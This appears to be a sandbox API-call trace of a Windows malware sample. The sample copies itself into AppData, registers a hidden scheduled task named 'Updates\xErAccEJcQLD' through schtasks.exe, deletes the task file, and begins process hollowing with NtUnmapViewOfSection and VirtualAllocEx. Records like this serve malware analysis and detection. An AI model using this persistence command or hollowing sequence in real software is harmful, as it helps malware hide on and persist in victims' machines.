[0166.317] VirtualProtect (in: lpAddress=0x8c807ec, dwSize=0x4, flNewProtect=0x40, lpflOldProtect=0x19cd3c | out: lpflOldProtect=0x19cd3c*=0x1) returned 0
[0166.322] VirtualProtect (in: lpAddress=0x8c807f0, dwSize=0x8, flNewProtect=0x40, lpflOldProtect=0x19cd3c | out: lpflOldProtect=0x19cd3c*=0x1) returned 0
[0166.328] VirtualProtect (in: lpAddress=0x8c807f8, dwSize=0x4, flNewProtect=0x40, lpflOldProtect=0x19cd3c | out: lpflOldProtect=0x19cd3c*=0x1) returned 0
[0166.328] VirtualProtect (in: lpAddress=0x8c807fc, dwSize=0x4, flNewProtect=0x40, lpflOldProtect=0x19cd3c | out: lpflOldProtect=0x19cd3c*=0x1) returned 0
[0166.328] VirtualProtect (in: lpAddress=0x8c80800, dwSize=0x8, flNewProtect=0x40, lpflOldProtect=0x19cd3c | out: lpflOldProtect=0x19cd3c*=0x1) returned 0
[0166.329] VirtualProtect (in: lpAddress=0x8c80808, dwSize=0x4, flNewProtect=0x40, lpflOldProtect=0x19cd3c | out: lpflOldProtect=0x19cd3c*=0x1) returned 0
[0166.329] VirtualProtect (in: lpAddress=0x8c8080c, dwSize=0x4, flNewProtect=0x40, lpflOldProtect=0x19cd3c | out: lpflOldProtect=0x19cd3c*=0x1) returned 0
[0166.329] VirtualProtect (in: lpAddress=0x8c80810, dwSize=0x4, flNewProtect=0x40, lpflOldProtect=0x19cd3c | out: lpflOldProtect=0x19cd3c*=0x1) returned 0
[0166.330] VirtualProtect (in: lpAddress=0x8c80814, dwSize=0x8, flNewProtect=0x40, lpflOldProtect=0x19cd3c | out: lpflOldProtect=0x19cd3c*=0x1) returned 0
[0166.333] VirtualProtect (in: lpAddress=0x8c8081c, dwSize=0x4, flNewProtect=0x40, lpflOldProtect=0x19cd3c | out: lpflOldProtect=0x19cd3c*=0x1) returned 0
[0166.334] VirtualProtect (in: lpAddress=0x8c80820, dwSize=0x4, flNewProtect=0x40, lpflOldProtect=0x19cd3c | out: lpflOldProtect=0x19cd3c*=0x1) returned 0
[0166.334] VirtualProtect (in: lpAddress=0x8c80824, dwSize=0x8, flNewProtect=0x40, lpflOldProtect=0x19cd3c | out: lpflOldProtect=0x19cd3c*=0x1) returned 0
[0166.338] VirtualProtect (in: lpAddress=0x8c8082c, dwSize=0x4, flNewProtect=0x40, lpflOldProtect=0x19cd3c | out: lpflOldProtect=0x19cd3c*=0x1) returned 0
[0166.338] VirtualProtect (in: lpAddress=0x8c80830, dwSize=0x4, flNewProtect=0x40, lpflOldProtect=0x19cd3c | out: lpflOldProtect=0x19cd3c*=0x1) returned 0
[0167.125] GetFullPathNameW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\Desktop\\8222127c77b4f83832246e9ce96da7741f1352da9d3548ad8b959b2e00b54c0d.exe", nBufferLength=0x105, lpBuffer=0x19cdf0, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\RDhJ0CNFevzX\\Desktop\\8222127c77b4f83832246e9ce96da7741f1352da9d3548ad8b959b2e00b54c0d.exe", lpFilePart=0x0) returned 0x62
[0167.125] GetLastError () returned 0x57
[0167.130] OpenMutexW (dwDesiredAccess=0x100001, bInheritHandle=0, lpName="ELAIITwngSefilReBsBJLauTa") returned 0x0
[0167.130] GetLastError () returned 0x2
[0167.139] CreateMutexW (lpMutexAttributes=0x0, bInitialOwner=0, lpName="ELAIITwngSefilReBsBJLauTa") returned 0x380
[0167.140] GetLastError () returned 0x0
[0172.212] SHGetFolderPathW (in: hwnd=0x0, csidl=26, hToken=0x0, dwFlags=0x0, pszPath=0x7a8160 | out: pszPath="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming") returned 0x0
[0172.213] GetFullPathNameW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming", nBufferLength=0x105, lpBuffer=0x19cde4, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming", lpFilePart=0x0) returned 0x25
[0172.213] GetLastError () returned 0x3f0
[0172.218] GetFullPathNameW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\xErAccEJcQLD.exe", nBufferLength=0x105, lpBuffer=0x19ce4c, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\xErAccEJcQLD.exe", lpFilePart=0x0) returned 0x36
[0172.218] GetLastError () returned 0x3f0
[0172.218] SetErrorMode (uMode=0x1) returned 0x0
[0172.218] GetFileAttributesExW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\xErAccEJcQLD.exe" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\roaming\\xeraccejcqld.exe"), fInfoLevelId=0x0, lpFileInformation=0x19d2cc | out: lpFileInformation=0x19d2cc*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 0
[0172.218] GetLastError () returned 0x2
[0172.218] SetErrorMode (uMode=0x0) returned 0x1
[0172.225] GetFullPathNameW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\Desktop\\8222127c77b4f83832246e9ce96da7741f1352da9d3548ad8b959b2e00b54c0d.exe", nBufferLength=0x105, lpBuffer=0x19cd2c, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\RDhJ0CNFevzX\\Desktop\\8222127c77b4f83832246e9ce96da7741f1352da9d3548ad8b959b2e00b54c0d.exe", lpFilePart=0x0) returned 0x62
[0172.225] GetLastError () returned 0x2
[0172.225] SetErrorMode (uMode=0x1) returned 0x0
[0172.225] CreateFileW (lpFileName="C:\\Users\\RDhJ0CNFevzX\\Desktop\\8222127c77b4f83832246e9ce96da7741f1352da9d3548ad8b959b2e00b54c0d.exe" (normalized: "c:\\users\\rdhj0cnfevzx\\desktop\\8222127c77b4f83832246e9ce96da7741f1352da9d3548ad8b959b2e00b54c0d.exe"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x354
[0172.225] GetLastError () returned 0x0
[0172.226] GetFileType (hFile=0x354) returned 0x1
[0172.226] SetErrorMode (uMode=0x0) returned 0x1
[0172.226] GetFileType (hFile=0x354) returned 0x1
[0172.226] GetFileSize (in: hFile=0x354, lpFileSizeHigh=0x19d2e0 | out: lpFileSizeHigh=0x19d2e0*=0x0) returned 0x182a00
[0172.226] GetLastError () returned 0x0
[0172.231] ReadFile (in: hFile=0x354, lpBuffer=0x3af5cc0, nNumberOfBytesToRead=0x182a00, lpNumberOfBytesRead=0x19d288, lpOverlapped=0x0 | out: lpBuffer=0x3af5cc0*, lpNumberOfBytesRead=0x19d288*=0x182a00, lpOverlapped=0x0) returned 1
[0172.267] GetLastError () returned 0x0
[0172.269] CloseHandle (hObject=0x354) returned 1
[0172.269] GetLastError () returned 0x0
[0172.273] GetFullPathNameW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\xErAccEJcQLD.exe", nBufferLength=0x105, lpBuffer=0x19cd34, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\xErAccEJcQLD.exe", lpFilePart=0x0) returned 0x36
[0172.273] GetLastError () returned 0x0
[0172.273] SetErrorMode (uMode=0x1) returned 0x0
[0172.274] CreateFileW (lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\xErAccEJcQLD.exe" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\roaming\\xeraccejcqld.exe"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x354
[0172.274] GetLastError () returned 0x0
[0172.275] GetFileType (hFile=0x354) returned 0x1
[0172.275] SetErrorMode (uMode=0x0) returned 0x1
[0172.275] GetFileType (hFile=0x354) returned 0x1
[0172.275] WriteFile (in: hFile=0x354, lpBuffer=0x3af5cc0*, nNumberOfBytesToWrite=0x182a00, lpNumberOfBytesWritten=0x19d294, lpOverlapped=0x0 | out: lpBuffer=0x3af5cc0*, lpNumberOfBytesWritten=0x19d294*=0x182a00, lpOverlapped=0x0) returned 1
[0172.307] GetLastError () returned 0x0
[0172.308] CloseHandle (hObject=0x354) returned 1
[0172.357] GetLastError () returned 0x0
[0172.445] GetCurrentProcess () returned 0xffffffff
[0172.445] GetLastError () returned 0x3f0
[0172.445] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x2000000, TokenHandle=0x19d200 | out: TokenHandle=0x19d200*=0x354) returned 1
[0172.445] GetLastError () returned 0x3f0
[0172.455] GetCurrentProcess () returned 0xffffffff
[0172.455] GetLastError () returned 0x3f0
[0172.455] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x2000000, TokenHandle=0x19d1b0 | out: TokenHandle=0x19d1b0*=0x384) returned 1
[0172.455] GetLastError () returned 0x3f0
[0172.458] GetTokenInformation (in: TokenHandle=0x354, TokenInformationClass=0x1, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0x19d258 | out: TokenInformation=0x0, ReturnLength=0x19d258) returned 0
[0172.458] GetLastError () returned 0x7a
[0172.460] LocalAlloc (uFlags=0x0, uBytes=0x24) returned 0x77d770
[0172.460] GetLastError () returned 0x7a
[0172.460] GetTokenInformation (in: TokenHandle=0x354, TokenInformationClass=0x1, TokenInformation=0x77d770, TokenInformationLength=0x24, ReturnLength=0x19d258 | out: TokenInformation=0x77d770, ReturnLength=0x19d258) returned 1
[0172.460] GetLastError () returned 0x7a
[0172.465] LsaOpenPolicy (in: SystemName=0x0, ObjectAttributes=0x19d124, DesiredAccess=0x800, PolicyHandle=0x19d0cc | out: PolicyHandle=0x19d0cc) returned 0x0
[0172.466] GetLastError () returned 0x0
[0172.467] LsaLookupSids (in: PolicyHandle=0x77e258, Count=0x1, Sids=0x27990ac*=0x279904c*(Revision=0x1, SubAuthorityCount=0x5, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x15, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x65)), ReferencedDomains=0x19d0f4, Names=0x19d0e8 | out: ReferencedDomains=0x19d0f4, Names=0x19d0e8) returned 0x0
[0172.492] GetLastError () returned 0x0
[0172.493] LsaClose (ObjectHandle=0x77e258) returned 0x0
[0172.493] GetLastError () returned 0x0
[0172.494] LsaFreeMemory (Buffer=0x7860e0) returned 0x0
[0172.494] GetLastError () returned 0x0
[0172.494] LsaFreeMemory (Buffer=0x784f08) returned 0x0
[0172.494] GetLastError () returned 0x0
[0172.497] GetTempPathW (in: nBufferLength=0x104, lpBuffer=0x7a8160 | out: lpBuffer="C:\\Users\\RDHJ0C~1\\AppData\\Local\\Temp\\") returned 0x25
[0172.498] GetLongPathNameW (in: lpszShortPath="C:\\Users\\RDHJ0C~1\\", lpszLongPath=0x19cdb8, cchBuffer=0x104 | out: lpszLongPath="C:\\Users\\RDhJ0CNFevzX\\") returned 0x16
[0172.499] GetLastError () returned 0x0
[0172.499] GetFullPathNameW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Temp\\", nBufferLength=0x105, lpBuffer=0x19cde0, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Temp\\", lpFilePart=0x0) returned 0x29
[0172.499] GetLastError () returned 0x0
[0172.499] GetFullPathNameW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Temp\\", nBufferLength=0x105, lpBuffer=0x19cd80, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Temp\\", lpFilePart=0x0) returned 0x29
[0172.499] GetLastError () returned 0x0
[0172.500] GetTempFileNameW (in: lpPathName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Temp\\", lpPrefixString="tmp", uUnique=0x0, lpTempFileName=0x7a8160 | out: lpTempFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Temp\\tmp2010.tmp" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\temp\\tmp2010.tmp")) returned 0x2010
[0172.501] GetLastError () returned 0x0
[0172.512] RtlAllocateHeap (HeapHandle=0x6c0000, Flags=0x0, Size=0x40) returned 0x7bd190
[0172.513] GetFullPathNameW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Temp\\tmp2010.tmp", nBufferLength=0x105, lpBuffer=0x19cc5c, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Temp\\tmp2010.tmp", lpFilePart=0x0) returned 0x34
[0172.513] GetLastError () returned 0x0
[0172.513] SetErrorMode (uMode=0x1) returned 0x0
[0172.513] CreateFileW (lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Temp\\tmp2010.tmp" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\temp\\tmp2010.tmp"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x8100000, hTemplateFile=0x0) returned 0x368
[0172.513] GetLastError () returned 0xb7
[0172.514] GetFileType (hFile=0x368) returned 0x1
[0172.514] SetErrorMode (uMode=0x0) returned 0x1
[0172.514] GetFileType (hFile=0x368) returned 0x1
[0172.515] WriteFile (in: hFile=0x368, lpBuffer=0x279ce3c*, nNumberOfBytesToWrite=0x66e, lpNumberOfBytesWritten=0x19d1b4, lpOverlapped=0x0 | out: lpBuffer=0x279ce3c*, lpNumberOfBytesWritten=0x19d1b4*=0x66e, lpOverlapped=0x0) returned 1
[0172.516] GetLastError () returned 0xb7
[0172.516] CloseHandle (hObject=0x368) returned 1
[0172.522] GetLastError () returned 0xb7
[0172.573] LocalAlloc (uFlags=0x0, uBytes=0x1a) returned 0x7bc590
[0172.574] RtlMoveMemory (in: Destination=0x7bc590, Source=0x279de4c, Length=0x1a | out: Destination=0x7bc590)
[0172.574] LocalAlloc (uFlags=0x0, uBytes=0xbe) returned 0x799b70
[0172.574] RtlMoveMemory (in: Destination=0x799b70, Source=0x279df34, Length=0xbe | out: Destination=0x799b70)
[0172.580] ShellExecuteExW (in: pExecInfo=0x279e204*(cbSize=0x3c, fMask=0x540, hwnd=0x0, lpVerb=0x0, lpFile="schtasks.exe", lpParameters="/Create /TN \"Updates\\xErAccEJcQLD\" /XML \"C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Temp\\tmp2010.tmp\"", lpDirectory=0x0, nShow=0, hInstApp=0x0, lpIDList=0x0, lpClass=0x0, hkeyClass=0x0, dwHotKey=0x0, hIcon=0x0, hMonitor=0x0, hProcess=0x0) | out: pExecInfo=0x279e204*(cbSize=0x3c, fMask=0x540, hwnd=0x0, lpVerb=0x0, lpFile="schtasks.exe", lpParameters="/Create /TN \"Updates\\xErAccEJcQLD\" /XML \"C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Temp\\tmp2010.tmp\"", lpDirectory=0x0, nShow=0, hInstApp=0x2a, lpIDList=0x0, lpClass=0x0, hkeyClass=0x0, dwHotKey=0x0, hIcon=0x0, hMonitor=0x0, hProcess=0x4d0)) returned 1
[0175.750] GetLastError () returned 0x0
[0175.751] LocalFree (hMem=0x7bc590) returned 0x0
[0175.751] GetLastError () returned 0x0
[0175.751] LocalFree (hMem=0x799b70) returned 0x0
[0175.751] GetLastError () returned 0x0
[0175.756] GetCurrentProcess () returned 0xffffffff
[0175.756] GetLastError () returned 0x0
[0175.756] GetCurrentProcess () returned 0xffffffff
[0175.756] GetLastError () returned 0x0
[0175.757] DuplicateHandle (in: hSourceProcessHandle=0xffffffff, hSourceHandle=0x4d0, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x19d1f4, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x19d1f4*=0x458) returned 1
[0175.757] GetLastError () returned 0x0
[0175.758] CoWaitForMultipleHandles (in: dwFlags=0x2, dwTimeout=0x7fffffff, cHandles=0x1, pHandles=0x19d21c*=0x458, lpdwindex=0x19cfd4 | out: lpdwindex=0x19cfd4) returned 0x0
[0195.762] CloseHandle (hObject=0x458) returned 1
[0195.762] GetLastError () returned 0x0
[0195.775] GetFullPathNameW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Temp\\tmp2010.tmp", nBufferLength=0x105, lpBuffer=0x19cde8, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Temp\\tmp2010.tmp", lpFilePart=0x0) returned 0x34
[0195.775] GetLastError () returned 0x0
[0195.781] DeleteFileW (lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Temp\\tmp2010.tmp" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\temp\\tmp2010.tmp")) returned 1
[0195.784] GetLastError () returned 0x0
[0195.814] GetFullPathNameW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\Desktop\\8222127c77b4f83832246e9ce96da7741f1352da9d3548ad8b959b2e00b54c0d.exe", nBufferLength=0x105, lpBuffer=0x19cd80, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\RDhJ0CNFevzX\\Desktop\\8222127c77b4f83832246e9ce96da7741f1352da9d3548ad8b959b2e00b54c0d.exe", lpFilePart=0x0) returned 0x62
[0195.814] GetLastError () returned 0x0
[0195.927] CreateProcessW (in: lpApplicationName="C:\\Users\\RDhJ0CNFevzX\\Desktop\\8222127c77b4f83832246e9ce96da7741f1352da9d3548ad8b959b2e00b54c0d.exe", lpCommandLine="\"{path}\"", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=0, dwCreationFlags=0x4, lpEnvironment=0x0, lpCurrentDirectory=0x0, lpStartupInfo=0x73daf8*(cb=0x44, lpReserved=0x0, lpDesktop=0x0, lpTitle=0x0, dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x0, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0), lpProcessInformation=0x19d260 | out: lpCommandLine="\"{path}\"", lpProcessInformation=0x19d260*(hProcess=0x454, hThread=0x458, dwProcessId=0x9a8, dwThreadId=0xce0)) returned 1
[0195.979] GetThreadContext (in: hThread=0x458, lpContext=0x279e9b8 | out: lpContext=0x279e9b8*(ContextFlags=0x10002, Dr0=0x0, Dr1=0x0, Dr2=0x0, Dr3=0x0, Dr6=0x0, Dr7=0x0, FloatSave.ControlWord=0x0, FloatSave.StatusWord=0x0, FloatSave.TagWord=0x0, FloatSave.ErrorOffset=0x0, FloatSave.ErrorSelector=0x0, FloatSave.DataOffset=0x0, FloatSave.DataSelector=0x0, FloatSave.RegisterArea=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0, [8]=0x0, [9]=0x0, [10]=0x0, [11]=0x0, [12]=0x0, [13]=0x0, [14]=0x0, [15]=0x0, [16]=0x0, [17]=0x0, [18]=0x0, [19]=0x0, [20]=0x0, [21]=0x0, [22]=0x0, [23]=0x0, [24]=0x0, [25]=0x0, [26]=0x0, [27]=0x0, [28]=0x0, [29]=0x0, [30]=0x0, [31]=0x0, [32]=0x0, [33]=0x0, [34]=0x0, [35]=0x0, [36]=0x0, [37]=0x0, [38]=0x0, [39]=0x0, [40]=0x0, [41]=0x0, [42]=0x0, [43]=0x0, [44]=0x0, [45]=0x0, [46]=0x0, [47]=0x0, [48]=0x0, [49]=0x0, [50]=0x0, [51]=0x0, [52]=0x0, [53]=0x0, [54]=0x0, [55]=0x0, [56]=0x0, [57]=0x0, [58]=0x0, [59]=0x0, [60]=0x0, [61]=0x0, [62]=0x0, [63]=0x0, [64]=0x0, [65]=0x0, [66]=0x0, [67]=0x0, [68]=0x0, [69]=0x0, [70]=0x0, [71]=0x0, [72]=0x0, [73]=0x0, [74]=0x0, [75]=0x0, [76]=0x0, [77]=0x0, [78]=0x0, [79]=0x0), FloatSave.Cr0NpxState=0x0, SegGs=0x0, SegFs=0x0, SegEs=0x0, SegDs=0x0, Edi=0x0, Esi=0x0, Ebx=0x386000, Edx=0x0, Ecx=0x0, Eax=0x583f8e, Ebp=0x0, Eip=0x0, SegCs=0x0, EFlags=0x0, Esp=0x0, SegSs=0x0, ExtendedRegisters=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0, [8]=0x0, [9]=0x0, [10]=0x0, [11]=0x0, [12]=0x0, [13]=0x0, [14]=0x0, [15]=0x0, [16]=0x0, [17]=0x0, [18]=0x0, [19]=0x0, [20]=0x0, [21]=0x0, [22]=0x0, [23]=0x0, [24]=0x0, [25]=0x0, [26]=0x0, [27]=0x0, [28]=0x0, [29]=0x0, [30]=0x0, [31]=0x0, [32]=0x0, [33]=0x0, [34]=0x0, [35]=0x0, [36]=0x0, [37]=0x0, [38]=0x0, [39]=0x0, [40]=0x0, [41]=0x0, [42]=0x0, [43]=0x0, [44]=0x0, [45]=0x0, [46]=0x0, [47]=0x0, [48]=0x0, [49]=0x0, [50]=0x0, [51]=0x0, [52]=0x0, [53]=0x0, [54]=0x0, [55]=0x0, [56]=0x0, [57]=0x0, [58]=0x0, [59]=0x0, [60]=0x0, [61]=0x0, [62]=0x0, [63]=0x0, [64]=0x0, [65]=0x0, [66]=0x0, [67]=0x0, [68]=0x0, [69]=0x0, [70]=0x0, [71]=0x0, [72]=0x0, [73]=0x0, [74]=0x0, [75]=0x0, [76]=0x0, [77]=0x0, [78]=0x0, [79]=0x0, [80]=0x0, [81]=0x0, [82]=0x0, [83]=0x0, [84]=0x0, [85]=0x0, [86]=0x0, [87]=0x0, [88]=0x0, [89]=0x0, [90]=0x0, [91]=0x0, [92]=0x0, [93]=0x0, [94]=0x0, [95]=0x0, [96]=0x0, [97]=0x0, [98]=0x0, [99]=0x0, [100]=0x0, [101]=0x0, [102]=0x0, [103]=0x0, [104]=0x0, [105]=0x0, [106]=0x0, [107]=0x0, [108]=0x0, [109]=0x0, [110]=0x0, [111]=0x0, [112]=0x0, [113]=0x0, [114]=0x0, [115]=0x0, [116]=0x0, [117]=0x0, [118]=0x0, [119]=0x0, [120]=0x0, [121]=0x0, [122]=0x0, [123]=0x0, [124]=0x0, [125]=0x0, [126]=0x0, [127]=0x0, [128]=0x0, [129]=0x0, [130]=0x0, [131]=0x0, [132]=0x0, [133]=0x0, [134]=0x0, [135]=0x0, [136]=0x0, [137]=0x0, [138]=0x0, [139]=0x0, [140]=0x0, [141]=0x0, [142]=0x0, [143]=0x0, [144]=0x0, [145]=0x0, [146]=0x0, [147]=0x0, [148]=0x0, [149]=0x0, [150]=0x0, [151]=0x0, [152]=0x0, [153]=0x0, [154]=0x0, [155]=0x0, [156]=0x0, [157]=0x0, [158]=0x0, [159]=0x0, [160]=0x0, [161]=0x0, [162]=0x0, [163]=0x0, [164]=0x0, [165]=0x0, [166]=0x0, [167]=0x0, [168]=0x0, [169]=0x0, [170]=0x0, [171]=0x0, [172]=0x0, [173]=0x0, [174]=0x0, [175]=0x0, [176]=0x0, [177]=0x0, [178]=0x0, [179]=0x0, [180]=0x0, [181]=0x0, [182]=0x0, [183]=0x0, [184]=0x0, [185]=0x0, [186]=0x0, [187]=0x0, [188]=0x0, [189]=0x0, [190]=0x0, [191]=0x0, [192]=0x0, [193]=0x0, [194]=0x0, [195]=0x0, [196]=0x0, [197]=0x0, [198]=0x0, [199]=0x0, [200]=0x0, [201]=0x0, [202]=0x0, [203]=0x0, [204]=0x0, [205]=0x0, [206]=0x0, [207]=0x0, [208]=0x0, [209]=0x0, [210]=0x0, [211]=0x0, [212]=0x0, [213]=0x0, [214]=0x0, [215]=0x0, [216]=0x0, [217]=0x0, [218]=0x0, [219]=0x0, [220]=0x0, [221]=0x0, [222]=0x0, [223]=0x0, [224]=0x0, [225]=0x0, [226]=0x0, [227]=0x0, [228]=0x0, [229]=0x0, [230]=0x0, [231]=0x0, [232]=0x0, [233]=0x0, [234]=0x0, [235]=0x0, [236]=0x0, [237]=0x0, [238]=0x0, [239]=0x0, [240]=0x0, [241]=0x0, [242]=0x0, [243]=0x0, [244]=0x0, [245]=0x0, [246]=0x0, [247]=0x0, [248]=0x0, [249]=0x0, [250]=0x0, [251]=0x0, [252]=0x0, [253]=0x0, [254]=0x0, [255]=0x0, [256]=0x0, [257]=0x0, [258]=0x0, [259]=0x0, [260]=0x0, [261]=0x0, [262]=0x0, [263]=0x0, [264]=0x0, [265]=0x0, [266]=0x0, [267]=0x0, [268]=0x0, [269]=0x0, [270]=0x0, [271]=0x0, [272]=0x0, [273]=0x0, [274]=0x0, [275]=0x0, [276]=0x0, [277]=0x0, [278]=0x0, [279]=0x0, [280]=0x0, [281]=0x0, [282]=0x0, [283]=0x0, [284]=0x0, [285]=0x0, [286]=0x0, [287]=0x0, [288]=0x0, [289]=0x0, [290]=0x0, [291]=0x0, [292]=0x0, [293]=0x0, [294]=0x0, [295]=0x0, [296]=0x0, [297]=0x0, [298]=0x0, [299]=0x0, [300]=0x0, [301]=0x0, [302]=0x0, [303]=0x0, [304]=0x0, [305]=0x0, [306]=0x0, [307]=0x0, [308]=0x0, [309]=0x0, [310]=0x0, [311]=0x0, [312]=0x0, [313]=0x0, [314]=0x0, [315]=0x0, [316]=0x0, [317]=0x0, [318]=0x0, [319]=0x0, [320]=0x0, [321]=0x0, [322]=0x0, [323]=0x0, [324]=0x0, [325]=0x0, [326]=0x0, [327]=0x0, [328]=0x0, [329]=0x0, [330]=0x0, [331]=0x0, [332]=0x0, [333]=0x0, [334]=0x0, [335]=0x0, [336]=0x0, [337]=0x0, [338]=0x0, [339]=0x0, [340]=0x0, [341]=0x0, [342]=0x0, [343]=0x0, [344]=0x0, [345]=0x0, [346]=0x0, [347]=0x0, [348]=0x0, [349]=0x0, [350]=0x0, [351]=0x0, [352]=0x0, [353]=0x0, [354]=0x0, [355]=0x0, [356]=0x0, [357]=0x0, [358]=0x0, [359]=0x0, [360]=0x0, [361]=0x0, [362]=0x0, [363]=0x0, [364]=0x0, [365]=0x0, [366]=0x0, [367]=0x0, [368]=0x0, [369]=0x0, [370]=0x0, [371]=0x0, [372]=0x0, [373]=0x0, [374]=0x0, [375]=0x0, [376]=0x0, [377]=0x0, [378]=0x0, [379]=0x0, [380]=0x0, [381]=0x0, [382]=0x0, [383]=0x0, [384]=0x0, [385]=0x0, [386]=0x0, [387]=0x0, [388]=0x0, [389]=0x0, [390]=0x0, [391]=0x0, [392]=0x0, [393]=0x0, [394]=0x0, [395]=0x0, [396]=0x0, [397]=0x0, [398]=0x0, [399]=0x0, [400]=0x0, [401]=0x0, [402]=0x0, [403]=0x0, [404]=0x0, [405]=0x0, [406]=0x0, [407]=0x0, [408]=0x0, [409]=0x0, [410]=0x0, [411]=0x0, [412]=0x0, [413]=0x0, [414]=0x0, [415]=0x0, [416]=0x0, [417]=0x0, [418]=0x0, [419]=0x0, [420]=0x0, [421]=0x0, [422]=0x0, [423]=0x0, [424]=0x0, [425]=0x0, [426]=0x0, [427]=0x0, [428]=0x0, [429]=0x0, [430]=0x0, [431]=0x0, [432]=0x0, [433]=0x0, [434]=0x0, [435]=0x0, [436]=0x0, [437]=0x0, [438]=0x0, [439]=0x0, [440]=0x0, [441]=0x0, [442]=0x0, [443]=0x0, [444]=0x0, [445]=0x0, [446]=0x0, [447]=0x0, [448]=0x0, [449]=0x0, [450]=0x0, [451]=0x0, [452]=0x0, [453]=0x0, [454]=0x0, [455]=0x0, [456]=0x0, [457]=0x0, [458]=0x0, [459]=0x0, [460]=0x0, [461]=0x0, [462]=0x0, [463]=0x0, [464]=0x0, [465]=0x0, [466]=0x0, [467]=0x0, [468]=0x0, [469]=0x0, [470]=0x0, [471]=0x0, [472]=0x0, [473]=0x0, [474]=0x0, [475]=0x0, [476]=0x0, [477]=0x0, [478]=0x0, [479]=0x0, [480]=0x0, [481]=0x0, [482]=0x0, [483]=0x0, [484]=0x0, [485]=0x0, [486]=0x0, [487]=0x0, [488]=0x0, [489]=0x0, [490]=0x0, [491]=0x0, [492]=0x0, [493]=0x0, [494]=0x0, [495]=0x0, [496]=0x0, [497]=0x0, [498]=0x0, [499]=0x0, [500]=0x0, [501]=0x0, [502]=0x0, [503]=0x0, [504]=0x0, [505]=0x0, [506]=0x0, [507]=0x0, [508]=0x0, [509]=0x0, [510]=0x0, [511]=0x0))) returned 1
[0195.981] ReadProcessMemory (in: hProcess=0x454, lpBaseAddress=0x386008, lpBuffer=0x19d248, nSize=0x4, lpNumberOfBytesRead=0x19d298 | out: lpBuffer=0x19d248*, lpNumberOfBytesRead=0x19d298*=0x4) returned 1
[0195.984] NtUnmapViewOfSection (ProcessHandle=0x454, BaseAddress=0x400000) returned 0x0
[0195.985] VirtualAllocEx (hProcess=0x454, lpAddress=0x400000, dwSize=0x38000, flAllocationType=0x3000, flProtect=0x40) returned 0x400000
